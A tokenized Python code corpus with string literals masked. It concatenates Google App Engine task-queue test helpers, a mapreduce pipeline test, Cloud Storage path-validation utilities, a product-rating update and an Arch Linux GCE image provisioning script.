. upper ( ) <EOL> request . 
environ [ environ_key ] = v <EOL> request . headers [ "<STR_LIT>" ] = retries <EOL> request . environ [ "<STR_LIT>" ] = ( <EOL> task . get ( "<STR_LIT:name>" , "<STR_LIT>" ) ) <EOL> request . environ [ "<STR_LIT>" ] = ( <EOL> task . get ( "<STR_LIT>" , "<STR_LIT:default>" ) ) <EOL> request . environ [ "<STR_LIT>" ] = request . path <EOL> if task [ "<STR_LIT>" ] == "<STR_LIT:POST>" : <EOL> request . body = base64 . b64decode ( task [ "<STR_LIT:body>" ] ) <EOL> for k , v in decode_task_payload ( task ) . iteritems ( ) : <EOL> request . set ( k , v ) <EOL> response = mock_webapp . MockResponse ( ) <EOL> saved_os_environ = os . environ <EOL> copy_os_environ = dict ( os . environ ) <EOL> copy_os_environ . update ( request . environ ) <EOL> try : <EOL> os . environ = copy_os_environ <EOL> handler = handler_class ( request , response ) <EOL> except TypeError : <EOL> handler = handler_class ( ) <EOL> handler . initialize ( request , response ) <EOL> finally : <EOL> os . environ = saved_os_environ <EOL> try : <EOL> os . environ = copy_os_environ <EOL> if task [ "<STR_LIT>" ] == "<STR_LIT:POST>" : <EOL> handler . post ( * params ) <EOL> elif task [ "<STR_LIT>" ] == "<STR_LIT:GET>" : <EOL> handler . get ( * params ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % task . method ) <EOL> finally : <EOL> os . environ = saved_os_environ <EOL> if handler . response . status != <NUM_LIT:200> : <EOL> raise Exception ( "<STR_LIT>" % <EOL> ( handler . response . status , <EOL> handler . response . status_message , <EOL> task , <EOL> handler ) ) <EOL> return handler <EOL> def execute_all_tasks ( taskqueue , queue = "<STR_LIT:default>" , handlers_map = None ) : <EOL> """<STR_LIT>""" <EOL> tasks = taskqueue . GetTasks ( queue ) <EOL> taskqueue . FlushQueue ( queue ) <EOL> task_run_counts = collections . 
defaultdict ( lambda : <NUM_LIT:0> ) <EOL> for task in tasks : <EOL> retries = <NUM_LIT:0> <EOL> while True : <EOL> try : <EOL> handler = execute_task ( task , retries , handlers_map = handlers_map ) <EOL> task_run_counts [ handler . __class__ ] += <NUM_LIT:1> <EOL> break <EOL> except Exception , e : <EOL> retries += <NUM_LIT:1> <EOL> if retries > <NUM_LIT:100> : <EOL> logging . debug ( "<STR_LIT>" , <EOL> task [ "<STR_LIT:name>" ] ) <EOL> raise <EOL> logging . debug ( <EOL> "<STR_LIT>" , <EOL> task [ "<STR_LIT:name>" ] , <EOL> retries ) <EOL> logging . debug ( e ) <EOL> return task_run_counts <EOL> def execute_until_empty ( taskqueue , queue = "<STR_LIT:default>" , handlers_map = None ) : <EOL> """<STR_LIT>""" <EOL> task_run_counts = collections . defaultdict ( lambda : <NUM_LIT:0> ) <EOL> while taskqueue . GetTasks ( queue ) : <EOL> new_counts = execute_all_tasks ( taskqueue , queue , handlers_map ) <EOL> for handler_cls in new_counts : <EOL> task_run_counts [ handler_cls ] += new_counts [ handler_cls ] <EOL> return task_run_counts </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import pipeline <EOL> import cloudstorage <EOL> from google . appengine . ext import db <EOL> from mapreduce import input_readers <EOL> from mapreduce import mapreduce_pipeline <EOL> from mapreduce import output_writers <EOL> from mapreduce import records <EOL> from mapreduce import test_support <EOL> from testlib import testutil <EOL> class TestEntity ( db . Model ) : <EOL> """<STR_LIT>""" <EOL> data = db . TextProperty ( ) <EOL> def map_yield_lots_of_values ( entity ) : <EOL> """<STR_LIT>""" <EOL> for _ in range ( <NUM_LIT> ) : <EOL> yield ( <NUM_LIT:1> , "<STR_LIT:U+0020>" * <NUM_LIT:100> ) <EOL> def reduce_length ( key , values ) : <EOL> """<STR_LIT>""" <EOL> yield str ( ( key , len ( values ) ) ) <EOL> class LargeMapreduceTest ( testutil . HandlerTestBase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> testutil . HandlerTestBase . setUp ( self ) <EOL> pipeline . Pipeline . _send_mail = self . _send_mail <EOL> self . emails = [ ] <EOL> def _send_mail ( self , sender , subject , body , html = None ) : <EOL> """<STR_LIT>""" <EOL> self . emails . append ( ( sender , subject , body , html ) ) <EOL> def testLotsOfValuesForSingleKey ( self ) : <EOL> TestEntity ( data = str ( <NUM_LIT:1> ) ) . put ( ) <EOL> p = mapreduce_pipeline . MapreducePipeline ( <EOL> "<STR_LIT:test>" , <EOL> __name__ + "<STR_LIT>" , <EOL> __name__ + "<STR_LIT>" , <EOL> input_reader_spec = input_readers . __name__ + "<STR_LIT>" , <EOL> output_writer_spec = ( <EOL> output_writers . __name__ + "<STR_LIT>" ) , <EOL> mapper_params = { <EOL> "<STR_LIT>" : __name__ + "<STR_LIT:.>" + TestEntity . __name__ , <EOL> } , <EOL> reducer_params = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT:test>" <EOL> } , <EOL> } , <EOL> shards = <NUM_LIT:16> ) <EOL> p . start ( ) <EOL> test_support . execute_until_empty ( self . taskqueue ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( self . emails ) ) <EOL> self . assertTrue ( self . 
emails [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . startswith ( <EOL> "<STR_LIT>" ) ) <EOL> p = mapreduce_pipeline . MapreducePipeline . from_id ( p . pipeline_id ) <EOL> output_data = [ ] <EOL> for output_file in p . outputs . default . value : <EOL> with cloudstorage . open ( output_file , "<STR_LIT:r>" ) as f : <EOL> for record in records . RecordsReader ( f ) : <EOL> output_data . append ( record ) <EOL> expected_data = [ "<STR_LIT>" ] <EOL> expected_data . sort ( ) <EOL> output_data . sort ( ) <EOL> self . assertEquals ( expected_data , output_data ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> import calendar <EOL> import datetime <EOL> from email import utils as email_utils <EOL> import logging <EOL> import os <EOL> import re <EOL> try : <EOL> from google . appengine . api import runtime <EOL> except ImportError : <EOL> from google . appengine . api import runtime <EOL> _GCS_BUCKET_REGEX_BASE = r'<STR_LIT>' <EOL> _GCS_BUCKET_REGEX = re . compile ( _GCS_BUCKET_REGEX_BASE + r'<STR_LIT:$>' ) <EOL> _GCS_BUCKET_PATH_REGEX = re . compile ( r'<STR_LIT:/>' + _GCS_BUCKET_REGEX_BASE + r'<STR_LIT:$>' ) <EOL> _GCS_PATH_PREFIX_REGEX = re . compile ( r'<STR_LIT:/>' + _GCS_BUCKET_REGEX_BASE + r'<STR_LIT>' ) <EOL> _GCS_FULLPATH_REGEX = re . compile ( r'<STR_LIT:/>' + _GCS_BUCKET_REGEX_BASE + r'<STR_LIT>' ) <EOL> _GCS_METADATA = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> _GCS_OPTIONS = _GCS_METADATA + [ '<STR_LIT>' ] <EOL> CS_XML_NS = '<STR_LIT>' <EOL> LOCAL_GCS_ENDPOINT = '<STR_LIT>' <EOL> _access_token = '<STR_LIT>' <EOL> _MAX_GET_BUCKET_RESULT = <NUM_LIT:1000> <EOL> def set_access_token ( access_token ) : <EOL> """<STR_LIT>""" <EOL> global _access_token <EOL> _access_token = access_token <EOL> def get_access_token ( ) : <EOL> """<STR_LIT>""" <EOL> return _access_token <EOL> class GCSFileStat ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> filename , <EOL> st_size , <EOL> etag , <EOL> st_ctime , <EOL> content_type = None , <EOL> metadata = None , <EOL> is_dir = False ) : <EOL> """<STR_LIT>""" <EOL> self . filename = filename <EOL> self . is_dir = is_dir <EOL> self . st_size = None <EOL> self . 
st_ctime = None <EOL> self . etag = None <EOL> self . content_type = content_type <EOL> self . metadata = metadata <EOL> if not is_dir : <EOL> self . st_size = long ( st_size ) <EOL> self . st_ctime = float ( st_ctime ) <EOL> if etag [ <NUM_LIT:0> ] == '<STR_LIT:">' and etag [ - <NUM_LIT:1> ] == '<STR_LIT:">' : <EOL> etag = etag [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> self . etag = etag <EOL> def __repr__ ( self ) : <EOL> if self . is_dir : <EOL> return '<STR_LIT>' % self . filename <EOL> return ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> dict ( filename = self . filename , <EOL> st_size = self . st_size , <EOL> st_ctime = self . st_ctime , <EOL> etag = self . etag , <EOL> content_type = self . content_type , <EOL> metadata = self . metadata ) ) <EOL> def __cmp__ ( self , other ) : <EOL> if not isinstance ( other , self . __class__ ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' , self . __class__ . __name__ , <EOL> other . __class__ . __name__ ) <EOL> if self . filename > other . filename : <EOL> return <NUM_LIT:1> <EOL> elif self . filename < other . filename : <EOL> return - <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> def __hash__ ( self ) : <EOL> if self . etag : <EOL> return hash ( self . etag ) <EOL> return hash ( self . filename ) <EOL> CSFileStat = GCSFileStat <EOL> def get_metadata ( headers ) : <EOL> """<STR_LIT>""" <EOL> return dict ( ( k , v ) for k , v in headers . iteritems ( ) <EOL> if any ( k . lower ( ) . startswith ( valid ) for valid in _GCS_METADATA ) ) <EOL> def validate_bucket_name ( name ) : <EOL> """<STR_LIT>""" <EOL> _validate_path ( name ) <EOL> if not _GCS_BUCKET_REGEX . match ( name ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % name ) <EOL> def validate_bucket_path ( path ) : <EOL> """<STR_LIT>""" <EOL> _validate_path ( path ) <EOL> if not _GCS_BUCKET_PATH_REGEX . 
match ( path ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % path ) <EOL> def validate_file_path ( path ) : <EOL> """<STR_LIT>""" <EOL> _validate_path ( path ) <EOL> if not _GCS_FULLPATH_REGEX . match ( path ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % path ) <EOL> def _process_path_prefix ( path_prefix ) : <EOL> """<STR_LIT>""" <EOL> _validate_path ( path_prefix ) <EOL> if not _GCS_PATH_PREFIX_REGEX . match ( path_prefix ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % path_prefix ) <EOL> bucket_name_end = path_prefix . find ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> bucket = path_prefix <EOL> prefix = None <EOL> if bucket_name_end != - <NUM_LIT:1> : <EOL> bucket = path_prefix [ : bucket_name_end ] <EOL> prefix = path_prefix [ bucket_name_end + <NUM_LIT:1> : ] or None <EOL> return bucket , prefix <EOL> def _validate_path ( path ) : <EOL> """<STR_LIT>""" <EOL> if not path : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not isinstance ( path , basestring ) : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( path . __class__ , path ) ) <EOL> def validate_options ( options ) : <EOL> """<STR_LIT>""" <EOL> if not options : <EOL> return <EOL> for k , v in options . iteritems ( ) : <EOL> if not isinstance ( k , str ) : <EOL> raise TypeError ( '<STR_LIT>' % k ) <EOL> if not any ( k . lower ( ) . startswith ( valid ) for valid in _GCS_OPTIONS ) : <EOL> raise ValueError ( '<STR_LIT>' % k ) <EOL> if not isinstance ( v , basestring ) : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( v , k ) ) <EOL> def http_time_to_posix ( http_time ) : <EOL> """<STR_LIT>""" <EOL> if http_time is not None : <EOL> return email_utils . mktime_tz ( email_utils . parsedate_tz ( http_time ) ) <EOL> def posix_time_to_http ( posix_time ) : <EOL> """<STR_LIT>""" <EOL> if posix_time : <EOL> return email_utils . 
formatdate ( posix_time , usegmt = True ) <EOL> _DT_FORMAT = '<STR_LIT>' <EOL> def dt_str_to_posix ( dt_str ) : <EOL> """<STR_LIT>""" <EOL> parsable , _ = dt_str . split ( '<STR_LIT:.>' ) <EOL> dt = datetime . datetime . strptime ( parsable , _DT_FORMAT ) <EOL> return calendar . timegm ( dt . utctimetuple ( ) ) <EOL> def posix_to_dt_str ( posix ) : <EOL> """<STR_LIT>""" <EOL> dt = datetime . datetime . utcfromtimestamp ( posix ) <EOL> dt_str = dt . strftime ( _DT_FORMAT ) <EOL> return dt_str + '<STR_LIT>' <EOL> def local_run ( ) : <EOL> """<STR_LIT>""" <EOL> server_software = os . environ . get ( '<STR_LIT>' ) <EOL> if server_software is None : <EOL> return True <EOL> if '<STR_LIT>' in server_software : <EOL> return False <EOL> if server_software . startswith ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return True <EOL> return False <EOL> def local_api_url ( ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( os . environ . get ( '<STR_LIT>' ) , LOCAL_GCS_ENDPOINT ) <EOL> def memory_usage ( method ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( * args , ** kwargs ) : <EOL> logging . info ( '<STR_LIT>' , <EOL> method . __name__ , runtime . memory_usage ( ) . current ( ) ) <EOL> result = method ( * args , ** kwargs ) <EOL> logging . info ( '<STR_LIT>' , <EOL> method . __name__ , runtime . memory_usage ( ) . current ( ) ) <EOL> return result <EOL> return wrapper <EOL> def _add_ns ( tagname ) : <EOL> return '<STR_LIT>' % { '<STR_LIT>' : CS_XML_NS , <EOL> '<STR_LIT>' : tagname } <EOL> _T_CONTENTS = _add_ns ( '<STR_LIT>' ) <EOL> _T_LAST_MODIFIED = _add_ns ( '<STR_LIT>' ) <EOL> _T_ETAG = _add_ns ( '<STR_LIT>' ) <EOL> _T_KEY = _add_ns ( '<STR_LIT>' ) <EOL> _T_SIZE = _add_ns ( '<STR_LIT>' ) <EOL> _T_PREFIX = _add_ns ( '<STR_LIT>' ) <EOL> _T_COMMON_PREFIXES = _add_ns ( '<STR_LIT>' ) <EOL> _T_NEXT_MARKER = _add_ns ( '<STR_LIT>' ) <EOL> _T_IS_TRUNCATED = _add_ns ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import config <EOL> import docs <EOL> import models <EOL> from google . appengine . ext . deferred import defer <EOL> from google . appengine . ext import ndb <EOL> def intClamp ( v , low , high ) : <EOL> """<STR_LIT>""" <EOL> return max ( int ( low ) , min ( int ( v ) , int ( high ) ) ) <EOL> def updateAverageRating ( review_key ) : <EOL> """<STR_LIT>""" <EOL> def _tx ( ) : <EOL> review = review_key . get ( ) <EOL> product = review . product_key . get ( ) <EOL> if not review . rating_added : <EOL> review . rating_added = True <EOL> product . num_reviews += <NUM_LIT:1> <EOL> product . avg_rating = ( product . avg_rating + <EOL> ( review . rating - product . avg_rating ) / float ( product . num_reviews ) ) <EOL> product . needs_review_reindex = True <EOL> ndb . put_multi ( [ product , review ] ) <EOL> if not config . BATCH_RATINGS_UPDATE : <EOL> defer ( <EOL> models . Product . updateProdDocWithNewRating , <EOL> product . key . id ( ) , _transactional = True ) <EOL> return ( product , review ) <EOL> try : <EOL> ndb . transaction ( _tx , xg = True ) <EOL> except AttributeError : <EOL> logging . exception ( '<STR_LIT>' <EOL> + '<STR_LIT>' ) </s>
<s> import logging <EOL> import os <EOL> import sys <EOL> import utils <EOL> ETC_MOTD = '''<STR_LIT>''' <EOL> ETC_HOSTS = '''<STR_LIT>''' <EOL> ETC_SSH_SSH_CONFIG = '''<STR_LIT>''' <EOL> ETC_SSH_SSHD_CONFIG = '''<STR_LIT>''' <EOL> ETC_SYSCTL_D_70_DISABLE_IPV6_CONF = '''<STR_LIT>''' <EOL> ETC_SYSCTL_D_70_GCE_SECURITY_STRONGLY_RECOMMENDED_CONF = '''<STR_LIT>''' <EOL> ETC_SYSCTL_D_70_GCE_SECURITY_RECOMMENDED_CONF = '''<STR_LIT>''' <EOL> ETC_PAM_D_PASSWD = '''<STR_LIT>''' <EOL> ETC_SUDOERS_D_ADD_GROUP_ADM = '''<STR_LIT>''' <EOL> ETC_FAIL2BAN_JAIL_LOCAL = '''<STR_LIT>''' <EOL> ETC_FAIL2BAN_JAIL_D_SSHD_CONF = '''<STR_LIT>''' <EOL> GCIMAGEBUNDLE_ARCH_PY = '''<STR_LIT>''' <EOL> def main ( ) : <EOL> args = utils . DecodeArgs ( sys . argv [ <NUM_LIT:1> ] ) <EOL> utils . SetupLogging ( quiet = args [ '<STR_LIT>' ] , verbose = args [ '<STR_LIT>' ] ) <EOL> logging . info ( '<STR_LIT>' ) <EOL> SetupLocale ( ) <EOL> ConfigureTimeZone ( ) <EOL> ConfigureKernel ( ) <EOL> InstallBootloader ( args [ '<STR_LIT>' ] , args [ '<STR_LIT>' ] , args [ '<STR_LIT>' ] ) <EOL> ForwardSystemdToConsole ( ) <EOL> SetupNtpServer ( ) <EOL> SetupNetwork ( ) <EOL> SetupSsh ( ) <EOL> SetupAccounts ( args ) <EOL> InstallGcePackages ( args [ '<STR_LIT>' ] ) <EOL> ConfigMessageOfTheDay ( ) <EOL> ConfigureSecurity ( ) <EOL> ConfigureSerialPortOutput ( ) <EOL> DisableUnusedServices ( ) <EOL> OptimizePackages ( ) <EOL> def SetupAccounts ( args ) : <EOL> accounts = args [ '<STR_LIT>' ] <EOL> if accounts : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> for account in accounts : <EOL> username , password = account . split ( '<STR_LIT::>' ) <EOL> logging . info ( '<STR_LIT>' , username ) <EOL> utils . Run ( [ '<STR_LIT>' , username , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> utils . Run ( '<STR_LIT>' % ( username , password ) , shell = True ) <EOL> def OptimizePackages ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Pacman ( [ '<STR_LIT>' ] ) <EOL> utils . 
Pacman ( [ '<STR_LIT>' ] ) <EOL> utils . Run ( [ '<STR_LIT>' ] ) <EOL> def SetupLocale ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . SetupArchLocale ( ) <EOL> def ConfigureTimeZone ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def ConfigureKernel ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Replace ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> utils . Replace ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . Run ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:-c>' , '<STR_LIT>' ] ) <EOL> def InstallBootloader ( device , uuid , debugmode ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:value>' , device ] ) <EOL> utils . CreateDirectory ( '<STR_LIT>' ) <EOL> utils . CopyFiles ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> utils . Replace ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , device ] ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' % device ] ) <EOL> boot_params = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> if debugmode : <EOL> boot_params += [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ] <EOL> boot_params = '<STR_LIT:U+0020>' . join ( boot_params ) <EOL> boot_spec = '<STR_LIT>' % ( uuid , boot_params ) <EOL> utils . 
ReplaceLine ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> boot_spec ) <EOL> def DisableUnusedServices ( ) : <EOL> utils . DisableService ( '<STR_LIT>' ) <EOL> utils . DisableService ( '<STR_LIT>' ) <EOL> def ForwardSystemdToConsole ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . AppendFile ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def SetupNtpServer ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def SetupNetwork ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_HOSTS ) <EOL> utils . WriteFile ( '<STR_LIT>' , <EOL> ETC_SYSCTL_D_70_DISABLE_IPV6_CONF ) <EOL> utils . Symlink ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> def SetupSsh ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_SSH_SSH_CONFIG ) <EOL> utils . Chmod ( '<STR_LIT>' , <NUM_LIT> ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_SSH_SSHD_CONFIG ) <EOL> utils . Chmod ( '<STR_LIT>' , <NUM_LIT> ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> def SetupFail2ban ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Pacman ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_FAIL2BAN_JAIL_LOCAL ) <EOL> utils . WriteFile ( '<STR_LIT>' , <EOL> ETC_FAIL2BAN_JAIL_D_SSHD_CONF ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> def ConfigureSecurity ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , <EOL> ETC_SYSCTL_D_70_GCE_SECURITY_STRONGLY_RECOMMENDED_CONF ) <EOL> utils . 
WriteFile ( '<STR_LIT>' , <EOL> ETC_SYSCTL_D_70_GCE_SECURITY_RECOMMENDED_CONF ) <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:root>' ] ) <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_PAM_D_PASSWD ) <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( '<STR_LIT>' ) <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_SUDOERS_D_ADD_GROUP_ADM ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def ConfigureSerialPortOutput ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Sed ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . ReplaceLine ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def InstallImportedPackages ( packages_dir ) : <EOL> aur_packages_dir = os . path . join ( packages_dir , '<STR_LIT>' ) <EOL> for aur_package in os . listdir ( aur_packages_dir ) : <EOL> utils . Pacman ( '<STR_LIT>' , aur_package , cwd = aur_packages_dir ) <EOL> def InstallGcePackages ( packages_dir ) : <EOL> try : <EOL> InstallGoogleCloudSdk ( ) <EOL> except : <EOL> pass <EOL> try : <EOL> InstallComputeImagePackages ( packages_dir ) <EOL> except : <EOL> pass <EOL> def InstallComputeImagePackages ( packages_dir ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . Run ( [ "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> packages_dir ] , <EOL> shell = True ) <EOL> utils . CopyFiles ( os . path . join ( packages_dir , '<STR_LIT>' , '<STR_LIT:*>' ) , '<STR_LIT:/>' ) <EOL> utils . CopyFiles ( os . path . join ( packages_dir , '<STR_LIT>' , '<STR_LIT:*>' ) , <EOL> '<STR_LIT:/>' ) <EOL> utils . 
SecureDeleteFile ( '<STR_LIT>' ) <EOL> PatchGoogleSystemdService ( <EOL> '<STR_LIT>' ) <EOL> PatchGoogleSystemdService ( <EOL> '<STR_LIT>' ) <EOL> PatchGoogleSystemdService ( <EOL> '<STR_LIT>' ) <EOL> PatchGoogleSystemdService ( <EOL> '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . EnableService ( '<STR_LIT>' ) <EOL> utils . DeleteDirectory ( packages_dir ) <EOL> def InstallGcimagebundle ( packages_dir ) : <EOL> utils . WriteFile ( <EOL> os . path . join ( packages_dir , '<STR_LIT>' ) , <EOL> GCIMAGEBUNDLE_ARCH_PY ) <EOL> utils . Run ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> cwd = os . path . join ( packages_dir , '<STR_LIT>' ) ) <EOL> def PatchGoogleSystemdService ( file_path ) : <EOL> utils . ReplaceLine ( file_path , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> utils . ReplaceLine ( file_path , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> def InstallGoogleCloudSdk ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> usr_share_google = '<STR_LIT>' <EOL> archive = os . path . join ( usr_share_google , '<STR_LIT>' ) <EOL> unzip_dir = os . path . join ( usr_share_google , '<STR_LIT>' ) <EOL> utils . CreateDirectory ( usr_share_google ) <EOL> utils . DownloadFile ( <EOL> '<STR_LIT>' , archive ) <EOL> utils . Run ( [ '<STR_LIT>' , archive , '<STR_LIT>' , usr_share_google ] ) <EOL> utils . AppendFile ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> utils . Run ( [ os . path . join ( unzip_dir , '<STR_LIT>' ) , <EOL> '<STR_LIT>' , '<STR_LIT:false>' , <EOL> '<STR_LIT>' , '<STR_LIT:true>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:true>' ] , <EOL> cwd = unzip_dir , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> utils . Symlink ( os . path . join ( unzip_dir , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> utils . Symlink ( os . path . join ( unzip_dir , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> utils . Symlink ( os . path . 
join ( unzip_dir , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> utils . SecureDeleteFile ( archive ) <EOL> def ConfigMessageOfTheDay ( ) : <EOL> utils . LogStep ( '<STR_LIT>' ) <EOL> utils . WriteFile ( '<STR_LIT>' , ETC_MOTD ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
